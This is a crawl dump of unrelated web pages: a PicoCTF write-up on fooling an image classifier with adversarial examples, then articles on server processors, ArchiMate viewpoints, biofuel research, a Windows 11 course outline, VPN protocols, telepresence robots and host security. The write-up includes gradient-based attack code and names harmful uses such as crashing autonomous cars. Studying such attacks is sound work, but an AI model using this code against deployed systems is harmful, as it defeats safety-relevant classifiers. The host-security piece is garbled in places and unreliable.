Fool the MachineTrick neural network classifiers Artificial Neural Networks ( ANNs) are certainly a wondrous achievement. They solve classification and other learning tasks with great accuracy. However, they are not flawless and might misclassify certain inputs. No problem, some error is expected. But what if you could give it two inputs that are virtually identical, but you get different outputs? Worse, what if one is correctly classified but the other has been manipulated so that it is classified as anything you want? Could these adversarial examples be the bane of neural networks? That is what happened with one PicoCTF challenge we came across recently. There is an application whose sole purpose is to accept a user-uploaded image, classify it, and let you know the results. Our task was to take the image of a dog, correctly classified as a Malinois, and manipulate it so that it is classified as a tree frog. However, for your image to be a proper adversarial example, it must be perceptually indistinguishable from the original, in other words, it must still look like the same previously-classified dog to a human. Figure 1. Challenge description. The applications are potentially endless. You could: - fool image recognition systems like physical security cameras, as does this Stealth T-shirt. - make an autonomous car crash. - confuse virtual assistants. - bypass spam filters, etc. So, how does one go about creating such an adversarial example? Recall that in our brief survey of machine learning techniques, we discussed It is an iterative process in which you continuously adjust the weight parameters of your black box (the ANN) until the outputs agree with the expected ones, or at least, minimize the cost function, which is a measure of how wrong the prediction is. I will borrow an image that better explains it from an article by Adam Geitgey . Figure 2. Training a neural network by . This technique is known as backpropagation. Now, in order to obtain a picture that is still like the original, but will classify as something entirely different, what one could do is add some noise; but not too much noise, so the picture doesn’t change, and not just anywhere, but exactly in the right places, so that the classifier reads a different pattern. Some clever folks from Google found out that the best way to do this is by using the gradient of the cost function. Figure 3. Adding noise to fool the classifier. From This is called the fast gradient sign method. This gradient can be computed using backpropagation but in reverse. Since the model is already trained, and we can’t modify it, let’s modify the picture little by little and see if it gets us any closer to the target. I will again @ageitgey since the analogy is much clearer this way. Figure 4. Tweaking the image, by . The pseudo-code that would generate an adversarial example via this method would be as follows. Assume that the model is saved in a h5 file, as in the challenge. Keras is a popular high-level neural networks Python. We can load the model, get the input and output layers (first and last), get the cost and gradient functions and define a convenience function that returns both for a particular input, like this: Getting cost function and gradients from a neural network. from keras.models import load_model from keras import backend as K model = load_model('model.h5') input_layer = model.layers.input output_layer = model.layers[-1].output cost_function = output_layer[0, object_type_to_fake] gradient_function = K.gradients(cost_function, input_layer) get_cost_and_gradients = K.function([input_layer, K.learning_phase()], [cost_function, gradient_function]) object_type_to_fake is the class number of what we want to fake. Now, according to the formula in figure 3 above, we should add a small fraction of the sign of the gradient, until we achieve the result. The result should be that the confidence in the prediction becomes at least while confidence < 0.95: cost, gradient = get_cost_and_gradients([adversarial_image, 0]) adversarial_image += 0.007 * np.sign(gradient) However, this procedure takes way too long without a GPU. A few hours according to Geitgey . For the CTFer and the more practical-minded reader, there is a library that does this and other attacks on machine learning systems to determine their vulnerability to CleverHans. Using this library, we change the expensive while cycle above to two make an instance of the attack method and then ask it to generate the from cleverhans.attacks import MomentumIterativeMethod method = MomentumIterativeMethod(model, sess=K.get_session()) test = method.generate_np(adversarial_image, eps=0.3, eps_iter=0.06, nb_iter=10, y_target=target) In this case, we used a different attack, namely the MomentumIterativeMethod because, in this situation, it gives better results than the FastGradientMethod, obviously also a part of CleverHans. And so we obtain our adversarial example. Figure 5. Adversarial image for the challenge You can almost see the tree frog lurking in the back, if you imagine the two knobs on the cabinet are its eyes. Just kidding. Upload it to the challenge site and, instead of getting the predictions, we get the flag. Not just that, the model which is based on is 99.99974% certain that this is a tree frog. However, the difference between it and the original image, according to the widely used perceptual hash algorithm, is less than two bits. Still, the adversarial example has artifacts, at least to a human observer. What is worse is that these issues persist across different models as long as the training data is similar. That means that we could probably pass the same image to a different animal image classifier and still get the same results. Ultimately, we should think twice before deploying measures. This is, of course, a mock example, but in more critical situations, having models that are not resistant to adversarial examples could result in catastrophic effects. Apparently, the reason behind this is the linearity within the functions hidden in these networks. So switching to a more non-linear model, such as RBF could solve the problem. Another workaround could be to train the including adversarial examples. To borrow a phrase from carpenters, "Measure twice, cut once." We should also remember that whatever the solution, it should be clear that one should test twice, and deploy once. Ready to try Continuous Hacking? Discover the benefits of our comprehensive Continuous Hacking solution, which hundreds of organizations are already enjoying.
<urn:uuid:73fa9ff4-acc0-4a60-b3b6-2918631532f6>
CC-MAIN-2022-40
https://fluidattacks.com/blog/fool-machine/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00269.warc.gz
en
0.912944
1,620
2.859375
3
How To Choose The Best Processor For Your Server In today's ever-evolving tech space, one thing seems to be certain. Our dependence on technology to support critical IT operations, home-lab setups, or any other server application simply isn't going anywhere anytime soon. In fact, it seems to be accelerating! As new computing platforms, apps and servers are released on a seemingly daily basis, it makes one consider if they are picking the right server and server specs to perform today and far into the future. At the core of this exponential growth in computing power is the processor, also known as the CPU or Central Processing Unit. The CPU is the engine driving all of the sophisticated computing processing to home servers, applications, virtual machines, and the like. Each year, we see a plethora of processors released that deliver cutting-edge specs, making last year's predecessor look like a dinosaur. It makes deciding on a processor even more challenging. To help support that decision process, and to clear up any misconceptions before making that plunge into a new CPU purchase, it's best to outline what specifications to look for in a server processor, understand how those specifications influence the greater computer ecosystem and understand what processor might be the right fit based on your tech needs. Of course, this is a critical decision as the CPU is going to act as the foundation of your computing platform, acting as the engine that drives the computing capabilities and either allows or disallows you to perform those key operations you are looking for in your server. A Quick Overview of the Server Processor When looking at purchasing the right processor for your server, there are some key specifications to consider: clock speed, cores, threads and cache. As a high-level overview, let's give a brief rundown of each spec before illustrating other processor considerations. Clock Speed. Clock speed is a critical processor specification. Measured in gigahertz (GHz). clock speed denotes how quickly your processor can complete computing calculations. The higher the clock speed, the faster applications will run, thus allowing you to run more complex applications. Cores. Processor cores are individual processing units within the multi-core central processing unit. These cores are what actually handle the individual processing task. Traditionally each core will process computing operations in a serialized manner, so instituting a multi-core processor – the most common implementation today – allows the processor to process multiple computing instructions in parallel. Threads. Threads can be thought of as the number of processors a chip can handle at once. Not to be confused with cores which are the physical processing units in a chip that facilitate computing processes, threads are virtual components that manage tasks at the software level. similar to the number of cores. Importantly, a single core can create multiple threads allowing for more virtual processes to happen in parallel, thus improving the computing capabilities of the physical chip. Cache. The cache is a fast access memory area that enables quicker data retrieval over the standard process where the processor retrieves data from RAM. There are three types of cache that serve varying functions. L1. Usually part of the chip itself and is the fastest cache type L2. Is larger than L1 cache but is also slower L3. Is the largest cache type, but slower than the above two Specifications of a Server Processor Now, both competitors (and other chip manufacturers in the space) release a series of chips, packed with different specs such as processor cores, cache size, clock speed, threads ect. Today, processors can still be broken down into the following categories: Entry Level. SMB ready, perfect for smaller VM footprints, home labs, and enthusiasts Mid-Level. This processor is more suited for mid-range organizations and is well-tailored for solutions that require decent computing capabilities Enterprise Level. Top-of-the-line processors suited for today's most computationally intensive applications like AI/ML/crypto mining. Both the companies (AMD and Intel) now offer several lines of processors that differ in: Number of cores Host Bus speed With various other characteristics and special features supported To drill down what specific processor is going to be the right fit for your unique use case, it's best to start by outlining the scope of your project. Ask yourself the following questions. What will you be using this server for? Will it be for a PlexLab? Are you running virtual machines? If so, how many? Will you be doing any crypto mining or other computationally intensive processes? In the latter instance, although crypto mining is traditionally GPU-intensive, it still takes quite substantial CPU resources. Once you've outlined what's important in the short term, it's important to outline how your project scope may change over the next one to three to five years. After you've built a strong outline of both of these use cases, our suggestion is to simply match spec requirements for your project against the processor that you’re considering purchasing. You'll want to compare clock speed, number of cores, cache of the given processor and the suggested specs in the given project. Keep in mind that servers are always evolving. If you start with one processor today and need to upgrade your server down the road, you always have that as an easy option. If you're interested in continuing to skill-up on IT topics through certifications or online courses, be sure to check out our CBT Nuggets certification training. We offer a wide variety of IT certification courses to help you grow your IT expertise!
<urn:uuid:a521b253-aeeb-405c-b71f-d9261d42bece>
CC-MAIN-2022-40
https://www.cbtnuggets.com/blog/technology/system-admin/how-to-choose-the-best-processor-for-your-server
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00269.warc.gz
en
0.924437
1,145
2.796875
3
In my previous blog post (https://bizzdesign.com/blog/a-pattern-for-sizing-archimate-diagrams) I described why it is useful to reduce complexity when creating architecture diagrams. It supports the architect by guiding the creation of diagrams and it supports the reader by not creating overly complex diagrams (too many different types of concepts). Each viewpoint addresses a specific concern, e.g. a capability map to show what the capabilities of a company are. In this blog I will focus on the application layer to provide practical examples using the viewpoint creation pattern described in the previous blog post. The examples are quite generic. They are meant to be used as a starting point for professionals looking to learn more on the subject so they appeal to a large audience. Structural relationships model the static construction or composition of concepts of the same or different types. The application components viewpoint can be set up to show the hierarchy of application components, their application services and which requirements are realized by the application (components) or their services. You can use it to create diagrams that simply show the components of an application. In this case, it supports you to add new elements to your model in a guided way. You can also show the requirements a new application (service) shall fulfill. The focus of this viewpoint is on one application, not on the dependencies or support for other application components. It is similar to the application structure viewpoint mentioned in the ArchiMate standard, but more restrictive, focusing on the hierarchical structure of one application and showing which requirements the new application shall realize. Compared to the whole ArchiMate standard, which includes 59 concepts and 13 relation types, this viewpoint only allows the creation of 3 different concepts and 2 different relationship types. This makes it even less complex than a BPMN process viewpoint. An example of the application components view is shown below. On the right-hand side, I made use of graphical nesting based on the composition relation to show an alternative graphical representation. Dependency relationships model how elements are used to support other elements. Employing the viewpoint creation pattern in this case will allow for the creation of dependency viewpoints at the level of serving and access relationships. The dependencies between applications are often shown in application communication (TOGAF) or application cooperation (ArchiMate) views. Bottom line, they show what the cooperation between applications looks like. It can be expressed in a static way by showing the application services (what the application component does) and the data accessed. The example below shows that the Payroll Service is accessing (reading) the Employee Data when serving the SAP Finance application component. Dynamic relationships model behavioral dependencies between elements. The two relationship types are flow and triggering. Often, triggering is used between processes, while at the application layer we often see flow being used between application components. As an alternative to the viewpoint explained above, you can use the flow relationship to create an application cooperation diagram in a slightly different way. By not using the application service you hide information, but this can be an advantage when you want to show an end-to-end data flow for one data object across your application landscape. These diagrams can involve a lot of applications, so by not showing which services access which data, the diagram remains less complex. In the example below, we also make use of the association relationship, depicted as interacting with the flow relationship (allowed since ArchiMate 3). Let’s recap. I applied the pattern described in my previous blog post to create ArchiMate viewpoints at the application layer. The pattern is very helpful to decide which elements and relationships are allowed in which diagram. Without such a pattern, for every constellation of concepts and relationships you will find a justification why they should be allowed in one viewpoint but not in another. So, this saves time when discussing which types of diagrams must be created in a standard way for projects. These viewpoints also implicitly provide an order for creating elements at relationships. Often it is useful first to show the components and/or services of a new application and why it is needed. Stating why a new application or a new service is needed supports you in ‘selling’ your architecture, for example in a presentation to management. While creating this view, you add new information to your repository in a guided way. The application cooperation views then show the context of your new application – where they impact the existing application landscape. A useful addition to an application cooperation viewpoint is to show which technology interface is used (e.g. REST API, FTP etc.). Especially in the dynamic application cooperation viewpoint, with the flow relationship, you should think of a convention governing how many flow relationships you allow between applications. Adding one flow relationship for each data object gives you the option to add properties like exchange frequency, push/pull of data, but can also lead to very cluttered diagrams. An alternative is to only create one flow relationship per technology interface. For the big picture, this might be good enough to guide the architecture development. As a complementary diagram for more detailed solution design in projects, you might want to use UML sequence diagrams that show in detail the data flows from one application to another (including confirmation messages that are important for solution design but not at a higher architecture level). And of course, you don´t want to clutter your diagram by adding all concepts and relationships. Instead you can use coloring and labeling to show information from the architecture model – see example below. The summarizing table below shows the three viewpoints presented above. You might want to create additional application layer viewpoints – for example, for logical architectures, by using the application function instead of the application component concept. Feel free to try out this viewpoint creation pattern yourself, it is a strong and useful guidance! In the next blog, I will show the usage of this viewpoint creation pattern to either the business or the technology layer. So stay tuned and until then, please take a look at a recent blog from Marc Lankhorst in which he positions architectural designs as one of three goals when communicating change to your stakeholders: https://bizzdesign.com/blog/communicating-architecture-with-stakeholders
<urn:uuid:ca0610da-580e-43e7-a243-4785b6a43078>
CC-MAIN-2022-40
https://bizzdesign.com/blog/practical-archimate-viewpoints-for-the-application-layer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00269.warc.gz
en
0.92913
1,259
2.59375
3
MSU scientists have a new proof of concept for a biofuel production platform that uses two species of marine algae and soil fungi. It lowers cultivation and harvesting costs and increases productivity, factors that currently hold back biofuels from being widely adopted. The species of alga, Nannochloropsis oceanica, and fungus, Mortierella elongata, both produce oils that we can harvest for human use. With these oils, we could make products like biofuels to power our cars or omega-3 fatty acids that are good for heart health. When scientists place the two organisms in the same environment, the tiny algae attach to the fungi to form big masses that are visible to the naked eye. This aggregation method is called bio-flocculation. When harvested together, the organisms yield more oil than if they were cultivated and harvested each on their own. “We used natural organisms with high affinity for each other,” says Zhi-Yan (Rock) Du, the study’s first author. “The algae are very productive, and the fungus we use is neither toxic to us nor edible. It’s a very common soil fungus that can be found in your back yard.” Other advantages reported by the researchers: - The system is sustainable, since it doesn’t rely on fossil fuels. The fungi grow on sewage or food waste, while the algae grow in sea water. - It is cheaper to harvest, as the big masses of algae and fungi are easily captured with simple tools, like a piece of mesh. - The method is potentially easier to scale, as the organisms are wild strains that have not been genetically modified. They pose no risks of infecting any environment they come in contact with. Solving problems that hamper biofuel production Bio-flocculation is a relatively new approach. Biofuels systems tend to rely on one species, such as algae, but they are held back by productivity and cost problems. First, systems that only rely on algae suffer from low oil productivity. “Algae can produce high amounts of oil when their growth is hindered by environmental stresses, such as nitrogen starvation. The popular method in the lab for algae oil is to grow the cells to high density levels and then starve them by separating them from the nutrients with centrifugation and several washing methods,” Du says. “This approach involves a lot of steps, time, and labor, and is not practical for industrial scale production.” The new approach feeds the algae with ammonium, one source of nitrogen that algae can quickly use for growth. However, the ammonium supply is controlled so the algae produce the maximum cell density and automatically enter nitrogen starvation. The closely monitored nitrogen diet can increase oil production and lower costs. The second problem is the high cost of harvesting oil, because algae are tiny and hard to collect. Harvesting can take up to 50% of oil production costs. “With bio-flocculation, the aggregates of fungi and algae are easy to harvest with simple and cheap tools,” Du says. Looking forward, the scientists want to mass produce biofuels with this system. They also know the entire genomes of both organisms and could use genetic engineering tools to further improve the method. The study was conducted in the labs of Christoph Benning and Gregory Bonito. It is published in the journal Biotechnology for Biofuels. Provided by Michigan State University
<urn:uuid:ff34a17c-d7cd-4b9f-b67a-bb19f55c1b10>
CC-MAIN-2022-40
https://debuglies.com/2018/09/13/msu-scientists-have-a-new-proof-of-concept-for-a-biofuel-production-platform-that-uses-two-species-of-marine-algae-and-soil-fungi/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00269.warc.gz
en
0.949188
724
3.5625
4
Whether you're new to computers or have used them in the past, this class will help you become more comfortable using Windows® 11 by familiarizing you with the Windows 11 user interface and its basic capabilities. In this course, you will explore Windows 11 and learn how to work with locally installed apps and cloud-based apps, browse the Internet, and manage basic Windows 11 settings. Who should attend This course is designed for end users who are familiar with computers and who need to use the features and functionality of the Windows 11 operating system. To ensure your success in this course, you should have some experience using a personal computer, desktop apps, and the Internet. After completing this course, students will be able to: - Access Windows 11. - Access locally installed apps. - Access cloud-based apps and content. - Manage files and folders. - Configure the Windows 11 environment. - Secure your Windows 11 computer. - Use Backup and Recovery Tools. Outline: Using Microsoft Windows 11 (91172) Module 1: Accessing Windows 11 - Log in to Windows 11 - Navigate the Windows 11 Desktop - Use the Start Menu Module 2: Accessing Locally Installed Apps - Use Apps - Multitask with Open Apps - Install Apps Module 3: Accessing Cloud-Based Apps and Content - Browse the Web - Use Cloud-Based Apps Module 4: Managing Files and Folders - Manage Files and Folders with File Explorer - Find Files, Folders, and Apps - Store and Share Files with OneDrive - Manage Removable Storage Devices Module 5: Configuring Windows 11 - Configure Settings - Use Windows System Commands - Manage Printers and Other Devices - Use Accessibility Features - Use Windows Tools Module 6: Securing Your Computer - Manage Passwords and Sign-In Options - Manage Windows Security - Manage Windows Updates - Use Other Security Features Module 7: Using Backup and Recovery Tools - Create Backups - Troubleshoot and Repair Your System
<urn:uuid:4f41fe4c-88d8-4d3f-bc46-db0e67297855>
CC-MAIN-2022-40
https://www.fastlanetraining.ca/course/microsoft-91172
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00269.warc.gz
en
0.778083
473
3.203125
3
What are VPN protocols and why do they matter? The various connection types tend to be confusing to most people, especially since many of them are acronyms that have no meaning by themselves. In this guide, I’d like to explain the different VPN protocols available, help you understand which you should use, and answer the most common questions I get from people. It’s important to note that you don’t have to understand VPN protocols in order to use a VPN. In fact, most of the time you won’t even see options for connection types until you open up the advanced settings. Most commercial VPNs are very plug-and-play. These advanced settings exist, however, because there are cases where you would want to choose how you connect with your VPN. That’s where this guide can help you. In this guide, we’re going to cover: Let’s dive into the different types of VPN protocols and then discuss how/why you would use them. By the end, you will have the confidence to choose the right connection type and understand how it will benefit you. Different Types of VPN Protocols While some VPN services develop their own proprietary protocols, there is a common standard of VPN protocols you’ll find across the board. Here’s a quick list of those that you’re most likely to run into. - PPTP – “Point-to-point tunneling protocol” - L2TP/IPsec – “Layer 2 tunneling protocol” - IKEv2/IPsec – “Internet key exchange version 2” - SSTP – “Secure socket tunneling protocol” There are others out there (i.e. Softether, Lightway, etc.), but since they either haven’t been widely adopted or are proprietary to a specific company, we won’t cover them in detail here. Almost all of the most popular VPN services will give you the option to choose from at least a couple options from the list. Simple Explanation of VPN Protocols Before I go into detail on each of the above connection protocols, here’s a quick synopsis of the pros and cons of each: |OpenVPN||Industry standard – secure, fast, and suitable for all VPN users;||Bloated source code| |Wireguard||Newest, open-source protocol that is faster and more stable than OpenVPN;||Relatively new and under development| |PPTP||Fast and ideal for streaming. Supported on older devices;||Least secure protocol and only recommended for advanced users.| |L2TP/IPsec||More secure than PPTP. Good in areas where newer protocols like OpenVPN are not supported.||Slower than OpenVPN. Only recommended for advanced users.| |IKEv2||Great for mobile devices. More secure than L2TP/IPSec.||Not as secure as OpenVPN or Wireguard;| |SSTP||Extremely secure and can bypass firewalls that L2TP can’t.||Mostly works only on Windows computers.| To dive a bit deeper, here’s what you need to know about each individual VPN connection protocol. 1. OpenVPN Connection Protocol What is OpenVPN? OpenVPN is the industry standard and generally the most recommended protocol used by VPN providers. Part of what makes OpenVPN so popular is the fact that it’s open source technology, unlike a few of the other VPN protocols that were developed my Microsoft. The strengths of OpenVPN include that it is: - Extremely secure; - Highly configurable; - Can be used on both TCP and UDP ports while supporting a large number of encryption algorithms and ciphers. Of course, its time-tested use is also its downfall: OpenVPN source code has been bloated with so much extra code over the years that it is bulky to install and sometimes slow to use. When to Use Open VPN: Use OpenVPN when security is your #1 priority. In short, if OpenVPN is an option for you, try to use it. 2. Wireguard – Newest Open-Source Protocol While the rest of these VPN communication standards listed here are at least two decades old, Wireguard was only introduced in the past couple years. I’ve already gone into detail about what makes Wireguard different, but the short answer is that it’s a much lighter code base that takes advantage of better encryption libraries. What does this mean for you as a user? Wireguard offers: - Encryption that is equal to or better than OpenVPN; - The most stable connection of any protocol here (i.e. it can remain connected when you jump between networks); - Most lightweight and fastest option (in other words, it connects faster and offers faster speeds); The primary downfall here is that it doesn’t have decades of use to test for flaws. The code is open source and is continuously reviewed, but it’s also continuously being improved when bugs or inefficiencies are found. When to Use WireGuard: There are only a select number of VPNs that offer Wireguard, but if you have the option, it’s worth testing this against OpenVPN to see which works better for you. 3. PPTP – VPN Protocols PPTP, which stands for Point-to-Point Tunneling Protocol, is among the earliest encryption protocols invented and can run on versions of Windows dating back to 1995. Because PPTP is one of the most common, it is also easy to set up and computationally fastest compared to other connection standards. Thus it is recommended for applications for which speed is most important, such as streaming video like Netflix over VPN. However, the major downside is that the PPTP connection offers very little security. Keep this in mind. When to Use PPTP: Use PPTP to stream geoblocked content at high speeds with limited buffering. 4. L2TP/IPsec VPN Protocol L2TP, which stands for Layer 2 Tunneling Protocol, is usually combined with IPsec, or Internet Protocol security. Sometimes you’ll only see it written out as L2TP when you’re using your favorite VPN software. L2TP was first proposed as an upgrade to PPTP. However, it tends to be a slower connection than PPTP. Interestingly, L2TP does not provide strong encryption alone, which is why it is always paired with IPsec for end-to-end security. Compared to PPTP, the L2TP protocol offers better security, but it’s still not quite as strong as what you’ll get with OpenVPN. When to Use L2TP: Use L2TP if you’re having a hard time connecting with OpenVPN or it isn’t an option for you. 5. IKEv2/IPsec VPN Protocol IKEv2, which stands for Internet Key Exchange Version 2, was initially developed by Microsoft and Cisco. It’s also the new kid on the block compared to other VPN protocols. Many VPN providers such as NordVPN tend to pair IKEv2 with IPsec for additional security. It also has the ability to automatically jump from WiFi to your wireless network without dropping the secure VPN connection, making it a popular option for mobile devices. Unfortunately, the added security and functionality also take a significant toll on the overall speed of IKEv2. When to Use IKEv2: Use IKEv2 for heavy mobile usage where you need a stable connection when switching networks. 6. SSTP (Windows Only) SSTP, which stands for Secure Socket Tunneling Protocol, is owned directly by Microsoft. As such, it works mostly on Windows, with functionality on Linux and Android as well. SSTP is regarded as among the most secure protocols as it transports traffic through the SSL (Secure Sockets Layer). It is also less susceptible to blocking by firewalls. When to Use SSTP: Use SSTP if you run a Windows computer. How to Choose Which VPN Protocol to Use So now that you know a little more about the available VPN encryption standards, let’s dive into how you might want to use them in your day-to-day life: - For general VPN users or newbies, you can always count on OpenVPN to guarantee anonymity, security, and the ability to access geo-restricted content. - For early adopters, Wireguard has proven itself over the past couple years to be the best new security available and may eventually unseat OpenVPN as the standard in the industry. - If online security, anonymity, and privacy are your top priorities for using a VPN, then OpenVPN, Wireguard or SSTP are the best. With these protocols, you won’t ever need to sweat about third parties seeing your IP address, geographic location, and online traffic. Remember that SSTP runs best on Windows devices, so if you have a non-Windows device, OpenVPN or Wireguard still provides all the security you need. - For those using a VPN primarily for streaming geo-restricted content, such as streaming Disney+ outside the US, try using PPTP or L2TP/IPsec. Remember that these two offer little to no encryption security. So if security isn’t essential, you can use PPTP for streaming content as it is fastest. For some added layer of security, use L2TP/IPsec even though it is slower than PPTP. Before using these protocols, check streaming performance while using OpenVPN as PPTP and L2TP/IPsec are known to have major security flaws. - The best for peer to peer downloading/torrenting are OpenVPN and Wireguard as they are best for anonymity and security. Some may recommend L2TP/IPsec to assist in increasing download speeds, but as L2TP/IPsec has security flaws, I would stay away from it when torrenting. It’s also important that you use a service with the VPN kill switch feature to make sure that if your connection does drop, your torrenting activity isn’t exposed. On mobile devices, use OpenVPN, Wireguard or IKEv2. Each allow for easy configuration that connects quickly on mobile devices. IKEv2 is another alternative as it can jump from WIFI networks to your cellular carrier without disconnecting. FAQ: Connection Protocols for VPNs The following are the most common questions asked about VPN connection standards. Each VPN protocol serves a different purpose and has different strengths and weaknesses. Therefore, the “best” depends on your use case. For example, proven security points to OpenVPN, while speed and agility might require the newer Wireguard. The fastest connection standard is generally considered to be PPTP, which stands for point-to-point tunneling protocol. It’s great for streaming video content, but it’s important to note that it doesn’t offer a high degree of security. OpenVPN and Wireguard are widely considered the most secure optionss available to most people. Both offer 256-bit encryption and an open source code base that has been critically reviewed. SSTP is also quite a secure connection, but since it’s controlled by Microsoft, it doesn’t work on all devices. In most cases, you shouldn’t change the VPN connection protocol often. The best VPN services will automatically choose the fastest connection for you. There are times, however, when you just won’t connect. It’s also possible that you might want faster speeds, more stability or greater security. Some VPNs use what’s known as “obfuscated servers” to evade censorship in certain countries. This isn’t a particular protocol as much as it is a specialized servers. It is these kinds of features that are essential if you’re looking for the right VPN to use in China. Final Thoughts | VPN Connection Protocols Although this list could have been much longer, OpenVPN, Wireguard, PPTP, L2TP, IKEv2 and SSTP are considered to be the most common available options you’ll find. Keep in mind that each VPN provider may add their own additional touch on the connection standards listed above. Therefore after choosing which is best for you, review that service provider’s website and see if they have added anything to further bolster security or performance.
<urn:uuid:5086ca9f-b067-41c1-b5dd-b999836f47a9>
CC-MAIN-2022-40
https://www.allthingssecured.com/vpn/faq/vpn-protocol-guide/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00269.warc.gz
en
0.93131
2,664
2.53125
3
The National Science Foundation (NSF) conducted a research that studied the preferences of university students and instructors in various class formats. The instructors preferred handling physical classes while the 18 students involved in the research were split between remote learning and attending classes in person, NSF said Wednesday. Amid their preferences, the instructors noted that most classes prefer the usage of telepresence robots as distance learning tools. The students added the robots have the capacity to make them expressive and self-aware in classes. "Research experience for undergraduates has become a big challenge during the ongoing pandemic, and telepresence robots can help not only in education but also in possibilities for undergraduates to hone their research skills through remote participation," said Prabhakaran Balakrishnan, program director at NSF's Division of Information and Intelligent Systems. A separate study by Oregon State University suggested that telepresence robots allow students to be more engaged with their classes.
<urn:uuid:66306b0b-07f9-4c0a-86dc-50f14557d971>
CC-MAIN-2022-40
https://executivegov.com/2020/06/nsf-study-explores-learning-preferences-of-instructors-students/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00269.warc.gz
en
0.96265
190
2.875
3
Establishing the security of the host is one of the major concerns these days. The reason of this is, that host can be the major thing too which can get infected. So, all those who can get connected to it are also exposed to some risks. Here are some ways through which can get rid of that problem; The security of the OS should be concern of everyone since it is used a lot in the world and hence there are some settings too which have to be done correctly so that no problem can come in future. One must take some steps to ensure that the security of the OS is not compromised and it is not easy one. He can take many steps like installation of some software's which can protect the OS to ensure the stability of it. Here are some anti-malwares which should be installed; Antivirus; it helps keeping away the viruses which can attack the computer. Anti-spam: One must know that this software's can help someone from the spam attacks. Anti-spyware: These programs can be sued for the protection against cyber spies. Pop-up blockers: Pop ups are the one of the most annoying things. So this software's help one keeping safe from them. The patch management is an important thing here so one should ensure that patches which are being applied are compatible and they can support the programs as well. Blacklisting of the application means that now that application should not be used anymore. There are some applications which can pose some great threats to the user since they can have some loop holes when they were developed or they have some other problems. So one should take some steps to ensure that such problems are handled in some good way and those applications are kept as blacklisted and they shouldn't be allowed in Firefox. The white listing of application is the opposite of this procedure. There is something which should be kept in the minds. That is, the OS which is being used for the host should be trusted one. There are two main SO which are android and the Apple. Also, there are Microsoft's windows. Except them, one should think critically and very carefully if he is willing to install any other OS into the host since it might contain some flaws and can be more vulnerable to the attacks as that OS is not developed by as much research as those three OS are. There are some firewalls which are set up by the host. So it happens that when we try to get connected to the host that fireback doesn't allow us to have access to it. It can be the plus point when the one who is trying to get access is unknown one but it might be the problem if the person who is getting avers is the known one and he aren't being let into the system, intentionally. One can get rid of this problem by simple allowing other Peron by adding some exception in the firewall. Another important thing is the detection for the host based intrusion. It might happen that someone from the host can make some breaking in and hence can try to get access to the data. Some appropriate measures should be taken for this so that the data theft and the lost can be stopped. When we talk about security, it is not only the software's which are needed to be secured. But there are some hardware's too since the hackers don't get access to something virtually, one might also be loaning to do some damage to the hardware since it is something one can't protect itself. There are many of the ways through which one can ensure that he keeps the hardware's at some place where no one can have access and hence he can stays secured from those hackers and the people who ants to ruin that hardware. Here are some techniques which are most commonly used by the people; Cable locks: There can be the threat to which some cables can be exposed too. Like, someone might take away the cables. The cables can play some really important role like if the Ethernet or the sub cable is taken away, it would be a big problem here. Because the elite function can be finished if the cables are missing. So, one might think of some plan like locking them up so that no one can get access to them. Safe: The hardware is supposed to stay safe because of it is broken or is damaged externally or internally, then it won't be able to work properly and one might not get the desired results which can help him finish the work is wants to work on. So the safety of the hardware should also be kept in mind when someone is planning the overall security of the computer. Locking cabinets: When it comes to the hardware security, there is a thing that one can easily put them into some cabinets and can lock them up there. But those cabinets are not the same as we find in kitchen or the bathroom; they are special ones which can have some holes in them so that the heat which is being generated can get out. If there's no hole there then there are some great chances that the devices which are kept there would get fried up and they won't be able to bear any heat. So, there should be some properly arrangements for the heat ventilation there in the can bets. This is basically something that has to do with the host's security. This is basically the attribute of the host and the software that how secures it is and how can one sue it while staying secure himself as well. Virtualization is now posing some really big challenges to the IT industry. There are some sprawls which are infrastructures and they compel the department related to IT to get around 70 present of totally budgets they have, channelled to the maintenance. Hence there are some less resources which are left for the innovation of business buildings. The difficult here arises from some architecture which is being followed today, like the computers having X86. These computers are normally designed for running of the operating system which is only one and there can be an only one application which cans UN along with that OS. Hence the result is the problem that some small data centres now have to deploy some more severs. Hence each of those servers starts operating at the capacity of round 15 present and they are too much inefficient by any of the standards. Also, the visualization software's can present the solution for the problem and hence they present many operation system sealed and hence the application can be running of them on only one host or the physical server. So these virtual machines are self-contained. Hence they can use as much of the resources as much they can need. Snapshots: One can take the snapshots of the process so that we can keep it as the proof that the process is being careered out properly. Patch compatibility: Another important thing which is focused here is that there is some compatibility which is for the patches. One can't just take a patch den can apply. One can take the example of the game. The patch would be applied if the previous versions the deer one and if the game supports that because if the condition isn't met then the patch won't get applied and one won't be able to get the desired result. Same is the case for the hosts as well for many applications the patch which one is trying to apply should have some compatibility else it won't get working easily. Host availability/elasticity: Another important thing is that when the one gets connected to the internet, the host must be available to send back some reply. It happens many times and comes into the common observation of everyone that when we get connected to the internet, sometimes we can't open the connection. Our server how is sending information works, the internet connection is at the right place but there is message showing that the host server isn't available or it is off-line. That's the fail point because of what one cent rally gets connected to the internet. So one should make sure that the hosts ever chosen has some elasticity and can stay up all the time so people can get connected to it easily whenever they feel like. Security control testing: whenever there is some issue regarding the security, there is something understood that there should be some testing's which have to be carried out so it can be ensured that all the security eared sari working quite well. There are some tests to which are valuable and one can put them on so that he can know if there is something which needs help with the security. Like it might happen that some application needs more security or there are the security points which are not enough. So, one can think about adding up more points so that the system can become strong one. Sandboxing: sandboxing is basically a technique which actually acts like the last line for the defence when some exploit happens. It can defend the hosts when there is some buggy application or there are some problems with that application. There are many OS retailers for the hosts which are ensuring it specially Apple. They ensure that such programs are actively distributed through the Max Store. Hence one can become as sage as it is possible and he doesn't have to face any problems any longer. There exists some virtual barrier there which is also known as some sandbox. It is basically some program which can isolate itself from the rest of the things. One can find some great thing about this sandbox ad it is that it 